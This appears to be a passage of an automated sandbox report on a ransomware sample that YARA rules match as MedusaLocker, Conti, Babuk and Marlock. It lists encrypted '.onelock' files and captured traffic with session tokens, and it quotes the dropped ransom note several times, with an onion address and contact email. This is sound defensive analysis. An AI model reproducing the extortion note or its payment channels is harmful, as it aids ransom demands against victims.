                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://evcs-ocsp.ws.symantec.com04
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.flexerasoftware.com0
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps09
                        Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa04
                        Source: 98j0BL6iLT.exe, how_to_back_files.html4.0.dr, how_to_back_files.html6.0.dr, how_to_back_files.html1.0.dr, how_to_back_files.html7.0.drString found in binary or memory: https://protonmail.com
                        Source: 98j0BL6iLT.exe, 00000000.00000003.291708233.000000000465B000.00000004.00000020.00020000.00000000.sdmp, 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                        Source: 98j0BL6iLT.exe, how_to_back_files.html4.0.dr, how_to_back_files.html6.0.dr, how_to_back_files.html1.0.dr, how_to_back_files.html7.0.drString found in binary or memory: https://www.torproject.org
                        Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 87284Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                        Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                        Source: unknownHTTPS traffic detected: 23.35.236.109:443 -> 192.168.2.3:49683 version: TLS 1.2

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Yara detected Conti ransomware
                        Source: Yara matchFile source: Process Memory Space: 98j0BL6iLT.exe PID: 6072, type: MEMORYSTR
                        Yara detected MedusaLocker Ransomware
                        Source: Yara matchFile source: 98j0BL6iLT.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.98j0BL6iLT.exe.9d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.svhost.exe.e50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.svhost.exe.e50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.246642887.000000000055B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.246011078.0000000000A44000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.249765327.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 98j0BL6iLT.exe PID: 6072, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 6088, type: MEMORYSTR
                        Yara detected Babuk Ransomware
                        Source: Yara matchFile source: Process Memory Space: 98j0BL6iLT.exe PID: 6072, type: MEMORYSTR
                        Yara detected Marlock Ransomware
                        Source: Yara matchFile source: Process Memory Space: 98j0BL6iLT.exe PID: 6072, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 6088, type: MEMORYSTR
                        Yara detected RansomwareGeneric
                        Source: Yara matchFile source: Process Memory Space: 98j0BL6iLT.exe PID: 6072, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svhost.exe PID: 6088, type: MEMORYSTR
                        Writes many files with high entropy
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\EFI\Microsoft\Boot\el-GR\bootmgr.efi.mui entropy: 7.99772312559Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\EFI\Microsoft\Boot\el-GR\memtest.efi.mui entropy: 7.99582795966Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Recovery\WindowsRE\boot.sdi entropy: 7.9999318449Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\ProgramData\Adobe\ARM\S\436\AdobeARM.msi entropy: 7.99981297736Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\EFI\Microsoft\Boot\bg-BG\bootmgfw.efi.mui entropy: 7.99730426679Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\EFI\Microsoft\Boot\bg-BG\bootmgr.efi.mui entropy: 7.99754253078Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Recovery\WindowsRE\Winre.wim entropy: 7.99958172984Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\EFI\Microsoft\Boot\bootmgfw.efi entropy: 7.99983515108Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\EFI\Microsoft\Boot\bootmgr.efi entropy: 7.99984657106Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\EFI\Microsoft\Boot\cs-CZ\bootmgfw.efi.mui entropy: 7.99787679044Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\EFI\Microsoft\Boot\cs-CZ\bootmgr.efi.mui entropy: 7.99752193403Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\EFI\Microsoft\Boot\cs-CZ\memtest.efi.mui entropy: 7.99639777267Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\EFI\Microsoft\Boot\da-DK\bootmgfw.efi.mui entropy: 7.99791255865Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\EFI\Microsoft\Boot\da-DK\bootmgr.efi.mui entropy: 7.99769643136Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\EFI\Microsoft\Boot\da-DK\memtest.efi.mui entropy: 7.99617858606Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\EFI\Microsoft\Boot\de-DE\bootmgfw.efi.mui entropy: 7.99820541999Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\EFI\Microsoft\Boot\de-DE\bootmgr.efi.mui entropy: 7.99761840026Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\EFI\Microsoft\Boot\de-DE\memtest.efi.mui entropy: 7.99649440624Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\EFI\Microsoft\Boot\el-GR\bootmgfw.efi.mui entropy: 7.99746028099Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi entropy: 7.99994132027Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Z:\Recovery\WindowsRE\boot.sdi.onelock (copy) entropy: 7.9999318449Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Adobe\ARM\S\436\AdobeARM.msi.onelock (copy) entropy: 7.99981297736Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Y:\EFI\Microsoft\Boot\bg-BG\bootmgfw.efi.mui.onelock (copy) entropy: 7.99730426679Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Y:\EFI\Microsoft\Boot\bg-BG\bootmgr.efi.mui.onelock (copy) entropy: 7.99754253078Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Y:\EFI\Microsoft\Boot\bootmgfw.efi.onelock (copy) entropy: 7.99983515108Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Y:\EFI\Microsoft\Boot\bootmgr.efi.onelock (copy) entropy: 7.99984657106Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Y:\EFI\Microsoft\Boot\cs-CZ\bootmgfw.efi.mui.onelock (copy) entropy: 7.99787679044Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Y:\EFI\Microsoft\Boot\cs-CZ\bootmgr.efi.mui.onelock (copy) entropy: 7.99752193403Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Y:\EFI\Microsoft\Boot\cs-CZ\memtest.efi.mui.onelock (copy) entropy: 7.99639777267Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Y:\EFI\Microsoft\Boot\da-DK\bootmgfw.efi.mui.onelock (copy) entropy: 7.99791255865Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Y:\EFI\Microsoft\Boot\da-DK\bootmgr.efi.mui.onelock (copy) entropy: 7.99769643136Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Y:\EFI\Microsoft\Boot\da-DK\memtest.efi.mui.onelock (copy) entropy: 7.99617858606Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Y:\EFI\Microsoft\Boot\de-DE\bootmgfw.efi.mui.onelock (copy) entropy: 7.99820541999Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Y:\EFI\Microsoft\Boot\de-DE\bootmgr.efi.mui.onelock (copy) entropy: 7.99761840026Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Y:\EFI\Microsoft\Boot\de-DE\memtest.efi.mui.onelock (copy) entropy: 7.99649440624Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Y:\EFI\Microsoft\Boot\el-GR\bootmgfw.efi.mui.onelock (copy) entropy: 7.99746028099Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Y:\EFI\Microsoft\Boot\el-GR\bootmgr.efi.mui.onelock (copy) entropy: 7.99772312559Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: C:\Documents and Settings\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi.onelock (copy) entropy: 7.99994132027Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Y:\EFI\Microsoft\Boot\el-GR\memtest.efi.mui.onelock (copy) entropy: 7.99582795966Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile created: Z:\Recovery\WindowsRE\Winre.wim.onelock (copy) entropy: 7.99958172984Jump to dropped file
                        Writes a notice file (html or txt) to demand a ransom
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\Recovery\WindowsRE\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\ProgramData\Adobe\ARM\S\436\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\EFI\Microsoft\Boot\bg-BG\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\EFI\Microsoft\Boot\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\EFI\Microsoft\Boot\cs-CZ\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\EFI\Microsoft\Boot\da-DK\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeFile dropped: C:\EFI\Microsoft\Boot\de-DE\how_to_back_files.html -> decrypt it for free<br>to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>contact us for price and get decryption software.</b><br><br><a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br>* note that this server is available via tor browser only<br><br>follow the instructions to open the link:<br> 1. type the addres "https://www.torproject.org" in your internet browser. it opens the tor site.<br> 2. press "download tor", then press "download tor browser bundle", install and run it.<br> 3. now you have tor browser. in the tor browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. start a chat and follow the further instructions. <br> <hr> <b>if you can not use the above link, use the email:</b><br> <a href="ithelp02@decorous.cyou ">ithelp02@decorous.cyou </a> <br> <a href=Jump to dropped file
